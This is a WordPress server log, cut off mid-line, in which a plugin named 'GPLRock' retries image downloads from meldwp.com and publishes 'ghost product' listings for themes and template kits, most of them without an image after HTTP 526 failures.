https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41eac488.webp [05-Apr-2026 07:13:24 UTC] GPLRock: Ghost product published with image - Product ID: groxi-grocery-store-elementor-template-kit [05-Apr-2026 07:13:26 UTC] GPLRock: Image downloaded successfully for product growthy-growth-hacking-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37f330d5.jpg [05-Apr-2026 07:13:26 UTC] GPLRock: Using pre-downloaded image for product growthy-growth-hacking-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37f330d5.jpg [05-Apr-2026 07:13:26 UTC] GPLRock: Ghost product published with image - Product ID: growthy-growth-hacking-marketing-agency-elementor-template-kit [05-Apr-2026 07:13:27 UTC] GPLRock: Image downloaded successfully for product groweal-health-coaching-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a8092ace.jpg [05-Apr-2026 07:13:27 UTC] GPLRock: Using pre-downloaded image for product groweal-health-coaching-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a8092ace.jpg [05-Apr-2026 07:13:27 UTC] GPLRock: Ghost product published with image - Product ID: groweal-health-coaching-elementor-template-kit [05-Apr-2026 07:15:06 UTC] GPLRock: Image download failed for product oworganic-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:15:08 UTC] GPLRock: Image download failed for product oworganic-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:15:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oworganic---multipurpose-woocommerce-wordpress-theme-4480.webp for product oworganic-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:15:10 UTC] GPLRock: Image download failed for product oworganic-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:15:12 UTC] GPLRock: Image download failed for product oworganic-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:15:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oworganic---multipurpose-woocommerce-wordpress-theme-4480.webp for product oworganic-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:15:14 UTC] GPLRock WARNING: Image download failed for product oworganic-multipurpose-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oworganic---multipurpose-woocommerce-wordpress-theme-4480.webp [05-Apr-2026 07:15:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oworganic-multipurpose-woocommerce-wordpress-theme [05-Apr-2026 07:15:14 UTC] GPLRock: Image download failed for product safedia-home-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:15:16 UTC] GPLRock: Image download failed for product safedia-home-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:15:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/safedia--home-security-wordpress-theme-27250.webp for product safedia-home-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:15:19 UTC] GPLRock: Image download failed for product safedia-home-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:15:21 UTC] GPLRock: Image download failed for product safedia-home-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:12 UTC] GPLRock: Image download failed for product bathrooms-and-kitchens-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:14 UTC] GPLRock: Image download failed for product bathrooms-and-kitchens-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bathrooms-and-kitchens---wordpress-theme-5408.webp for product bathrooms-and-kitchens-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:16 UTC] GPLRock: Image download failed for product bathrooms-and-kitchens-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:18 UTC] GPLRock: Image download failed for product bathrooms-and-kitchens-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bathrooms-and-kitchens---wordpress-theme-5408.webp for product bathrooms-and-kitchens-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:20 UTC] GPLRock WARNING: Image download failed for product bathrooms-and-kitchens-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bathrooms-and-kitchens---wordpress-theme-5408.webp [05-Apr-2026 07:25:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bathrooms-and-kitchens-wordpress-theme [05-Apr-2026 07:25:20 UTC] GPLRock: Image download failed for product yoku-yoga-studio-ayurveda-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:23 UTC] GPLRock: Image download failed for product yoku-yoga-studio-ayurveda-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yoku---yoga-studio--ayurveda-wordpress-15220.webp for product yoku-yoga-studio-ayurveda-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:25 UTC] GPLRock: Image download failed for product yoku-yoga-studio-ayurveda-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:27 UTC] GPLRock: Image download failed for product yoku-yoga-studio-ayurveda-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yoku---yoga-studio--ayurveda-wordpress-15220.webp for product yoku-yoga-studio-ayurveda-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:29 UTC] GPLRock WARNING: Image download failed for product yoku-yoga-studio-ayurveda-wordpress. URL: https://meldwp.com/wp-content/uploads/yoku---yoga-studio--ayurveda-wordpress-15220.webp [05-Apr-2026 07:25:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yoku-yoga-studio-ayurveda-wordpress [05-Apr-2026 07:25:29 UTC] GPLRock: Image download failed for product reveal-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:31 UTC] GPLRock: Image download failed for product reveal-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reveal---directory--listing-wordpress-theme-4718.webp for product reveal-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:34 UTC] GPLRock: Image download failed for product reveal-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:36 UTC] GPLRock: Image download failed for product reveal-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reveal---directory--listing-wordpress-theme-4718.webp for product reveal-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:38 UTC] GPLRock WARNING: Image download failed for product reveal-directory-listing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/reveal---directory--listing-wordpress-theme-4718.webp [05-Apr-2026 07:25:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: reveal-directory-listing-wordpress-theme [05-Apr-2026 07:25:38 UTC] GPLRock: Image download failed for product healthy-pregnancy-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:40 UTC] GPLRock: Image download failed for product healthy-pregnancy-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healthy-pregnancy---health--medical-wordpress-theme-8906.webp for product healthy-pregnancy-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:43 UTC] GPLRock: Image download failed for product healthy-pregnancy-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:45 UTC] GPLRock: Image download failed for product healthy-pregnancy-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healthy-pregnancy---health--medical-wordpress-theme-8906.webp for product healthy-pregnancy-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:47 UTC] GPLRock WARNING: Image download failed for product healthy-pregnancy-health-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/healthy-pregnancy---health--medical-wordpress-theme-8906.webp [05-Apr-2026 07:25:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: healthy-pregnancy-health-medical-wordpress-theme [05-Apr-2026 07:25:47 UTC] GPLRock: Image download failed for product mountain-one-page-parallax-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:49 UTC] GPLRock: Image download failed for product mountain-one-page-parallax-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mountain---one-page-parallax-wordpress-theme-19477.webp for product mountain-one-page-parallax-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:51 UTC] GPLRock: Image download failed for product mountain-one-page-parallax-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:53 UTC] GPLRock: Image download failed for product mountain-one-page-parallax-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mountain---one-page-parallax-wordpress-theme-19477.webp for product mountain-one-page-parallax-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:25:55 UTC] GPLRock WARNING: Image download failed for product mountain-one-page-parallax-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mountain---one-page-parallax-wordpress-theme-19477.webp [05-Apr-2026 07:25:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mountain-one-page-parallax-wordpress-theme [05-Apr-2026 07:25:56 UTC] GPLRock: Image download failed for product agile-multi-purpose-app-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:25:58 UTC] GPLRock: Image download failed for product agile-multi-purpose-app-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agile---multi-purpose-app-showcase-wordpress-theme-25131.webp for product agile-multi-purpose-app-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:00 UTC] GPLRock: Image download failed for product agile-multi-purpose-app-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:03 UTC] GPLRock: Image download failed for product agile-multi-purpose-app-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agile---multi-purpose-app-showcase-wordpress-theme-25131.webp for product agile-multi-purpose-app-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:05 UTC] GPLRock WARNING: Image download failed for product agile-multi-purpose-app-showcase-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agile---multi-purpose-app-showcase-wordpress-theme-25131.webp [05-Apr-2026 07:26:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agile-multi-purpose-app-showcase-wordpress-theme [05-Apr-2026 07:26:05 UTC] GPLRock: Image download failed for product polor-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:07 UTC] GPLRock: Image download failed for product polor-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/polor--personal-blog-wordpress-theme-24691.webp for product polor-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:10 UTC] GPLRock: Image download failed for product polor-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:12 UTC] GPLRock: Image download failed for product polor-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/polor--personal-blog-wordpress-theme-24691.webp for product polor-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:14 UTC] GPLRock WARNING: Image download failed for product polor-personal-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/polor--personal-blog-wordpress-theme-24691.webp [05-Apr-2026 07:26:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: polor-personal-blog-wordpress-theme [05-Apr-2026 07:26:14 UTC] GPLRock: Image download failed for product ajzaa-auto-parts-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:16 UTC] GPLRock: Image download failed for product ajzaa-auto-parts-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ajzaa---auto-parts-store-wordpress-theme-7548.webp for product ajzaa-auto-parts-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:18 UTC] GPLRock: Image download failed for product ajzaa-auto-parts-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:21 UTC] GPLRock: Image download failed for product ajzaa-auto-parts-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ajzaa---auto-parts-store-wordpress-theme-7548.webp for product ajzaa-auto-parts-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:23 UTC] GPLRock WARNING: Image download failed for product ajzaa-auto-parts-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ajzaa---auto-parts-store-wordpress-theme-7548.webp [05-Apr-2026 07:26:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ajzaa-auto-parts-store-wordpress-theme [05-Apr-2026 07:26:23 UTC] GPLRock: Image download failed for product deasil-travel-and-tour-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:25 UTC] GPLRock: Image download failed for product deasil-travel-and-tour-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deasil---travel-and-tour-wordpress-theme-31621.webp for product deasil-travel-and-tour-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:27 UTC] GPLRock: Image download failed for product deasil-travel-and-tour-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:29 UTC] GPLRock: Image download failed for product deasil-travel-and-tour-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deasil---travel-and-tour-wordpress-theme-31621.webp for product deasil-travel-and-tour-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:31 UTC] GPLRock WARNING: Image download failed for product deasil-travel-and-tour-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/deasil---travel-and-tour-wordpress-theme-31621.webp [05-Apr-2026 07:26:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: deasil-travel-and-tour-wordpress-theme [05-Apr-2026 07:26:32 UTC] GPLRock: Image download failed for product etc-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:34 UTC] GPLRock: Image download failed for product etc-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/etc---creative-portfolio-wordpress-theme-23961.webp for product etc-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:36 UTC] GPLRock: Image download failed for product etc-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:38 UTC] GPLRock: Image download failed for product etc-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:26:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/etc---creative-portfolio-wordpress-theme-23961.webp for product etc-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:26:40 UTC] GPLRock WARNING: Image download failed for product etc-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/etc---creative-portfolio-wordpress-theme-23961.webp [05-Apr-2026 07:26:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: etc-creative-portfolio-wordpress-theme [05-Apr-2026 07:27:45 UTC] GPLRock: Image downloaded successfully for product driveria-driving-course-traffic-school-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ddca9ef3.jpg [05-Apr-2026 07:27:45 UTC] GPLRock: Using pre-downloaded image for product driveria-driving-course-traffic-school-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ddca9ef3.jpg [05-Apr-2026 07:27:45 UTC] GPLRock: Ghost product published with image - Product ID: driveria-driving-course-traffic-school-elementor-template-kit [05-Apr-2026 07:27:47 UTC] GPLRock: Image downloaded successfully for product dribo-cleaning-company-template-kit-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dcc332e1.jpg [05-Apr-2026 07:27:47 UTC] GPLRock: Using pre-downloaded image for product dribo-cleaning-company-template-kit-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dcc332e1.jpg [05-Apr-2026 07:27:47 UTC] GPLRock: Ghost product published with image - Product ID: dribo-cleaning-company-template-kit-for-elementor [05-Apr-2026 07:27:48 UTC] GPLRock: Image downloaded successfully for product dravely-travel-vacation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e0018eac.webp [05-Apr-2026 07:27:49 UTC] GPLRock: Using pre-downloaded image for product dravely-travel-vacation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e0018eac.webp [05-Apr-2026 07:27:49 UTC] GPLRock: Ghost product published with image - Product ID: dravely-travel-vacation-elementor-template-kit [05-Apr-2026 07:37:42 UTC] GPLRock: Image download failed for product industify-industry-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:37:44 UTC] GPLRock: Image download failed for product industify-industry-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:37:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/industify---industry-wordpress-theme-25508.webp for product industify-industry-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:37:46 UTC] GPLRock: Image download failed for product industify-industry-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:37:48 UTC] GPLRock: Image download failed for product industify-industry-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:37:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/industify---industry-wordpress-theme-25508.webp for product industify-industry-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:37:51 UTC] GPLRock WARNING: Image download failed for product industify-industry-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/industify---industry-wordpress-theme-25508.webp [05-Apr-2026 07:37:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: industify-industry-wordpress-theme [05-Apr-2026 07:37:51 UTC] GPLRock: Image download failed for product catalog-buy-sell-marketplace-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:37:53 UTC] GPLRock: Image download failed for product catalog-buy-sell-marketplace-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:37:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/catalog--buy-sell--marketplace-responsive-wordpress-theme-5478.webp for product catalog-buy-sell-marketplace-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:37:55 UTC] GPLRock: Image download failed for product catalog-buy-sell-marketplace-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:37:57 UTC] GPLRock: Image download failed for product catalog-buy-sell-marketplace-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:37:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/catalog--buy-sell--marketplace-responsive-wordpress-theme-5478.webp for product catalog-buy-sell-marketplace-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:37:59 UTC] GPLRock WARNING: Image download failed for product catalog-buy-sell-marketplace-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/catalog--buy-sell--marketplace-responsive-wordpress-theme-5478.webp [05-Apr-2026 07:37:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: catalog-buy-sell-marketplace-responsive-wordpress-theme [05-Apr-2026 07:37:59 UTC] GPLRock: Image download failed for product ziston-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:02 UTC] GPLRock: Image download failed for product ziston-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ziston---directory-listing-wordpress-theme-15056.webp for product ziston-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:04 UTC] GPLRock: Image download failed for product ziston-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:06 UTC] GPLRock: Image download failed for product ziston-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ziston---directory-listing-wordpress-theme-15056.webp for product ziston-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:08 UTC] GPLRock WARNING: Image download failed for product ziston-directory-listing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ziston---directory-listing-wordpress-theme-15056.webp [05-Apr-2026 07:38:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ziston-directory-listing-wordpress-theme [05-Apr-2026 07:38:08 UTC] GPLRock: Image downloaded successfully for product netshare-paywall-content-sharing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59c58435.webp [05-Apr-2026 07:38:08 UTC] GPLRock: Using pre-downloaded image for product netshare-paywall-content-sharing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59c58435.webp [05-Apr-2026 07:38:08 UTC] GPLRock: Ghost product published with image - Product ID: netshare-paywall-content-sharing-wordpress-theme [05-Apr-2026 07:38:08 UTC] GPLRock: Image download failed for product corzo-consulting-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:10 UTC] GPLRock: Image download failed for product corzo-consulting-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corzo---consulting-wordpress-10243.webp for product corzo-consulting-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:13 UTC] GPLRock: Image download failed for product corzo-consulting-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:15 UTC] GPLRock: Image download failed for product corzo-consulting-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corzo---consulting-wordpress-10243.webp for product corzo-consulting-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:17 UTC] GPLRock WARNING: Image download failed for product corzo-consulting-wordpress. URL: https://meldwp.com/wp-content/uploads/corzo---consulting-wordpress-10243.webp [05-Apr-2026 07:38:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: corzo-consulting-wordpress [05-Apr-2026 07:38:17 UTC] GPLRock: Image download failed for product eva-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:19 UTC] GPLRock: Image download failed for product eva-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eva---fashion-woocommerce-theme-29448.webp for product eva-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:21 UTC] GPLRock: Image download failed for product eva-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:23 UTC] GPLRock: Image download failed for product eva-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eva---fashion-woocommerce-theme-29448.webp for product eva-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:25 UTC] GPLRock WARNING: Image download failed for product eva-fashion-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/eva---fashion-woocommerce-theme-29448.webp [05-Apr-2026 07:38:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eva-fashion-woocommerce-theme [05-Apr-2026 07:38:26 UTC] GPLRock: Image download failed for product capie-minimal-creative-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:28 UTC] GPLRock: Image download failed for product capie-minimal-creative-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/capie---minimal-creative-woocommerce-wordpress-theme-21675.webp for product capie-minimal-creative-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:30 UTC] GPLRock: Image download failed for product capie-minimal-creative-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:32 UTC] GPLRock: Image download failed for product capie-minimal-creative-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/capie---minimal-creative-woocommerce-wordpress-theme-21675.webp for product capie-minimal-creative-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:34 UTC] GPLRock WARNING: Image download failed for product capie-minimal-creative-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/capie---minimal-creative-woocommerce-wordpress-theme-21675.webp [05-Apr-2026 07:38:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: capie-minimal-creative-woocommerce-wordpress-theme [05-Apr-2026 07:38:34 UTC] GPLRock: Image download failed for product mccan-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:37 UTC] GPLRock: Image download failed for product mccan-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mccan---portfolio-wordpress-theme-14540.webp for product 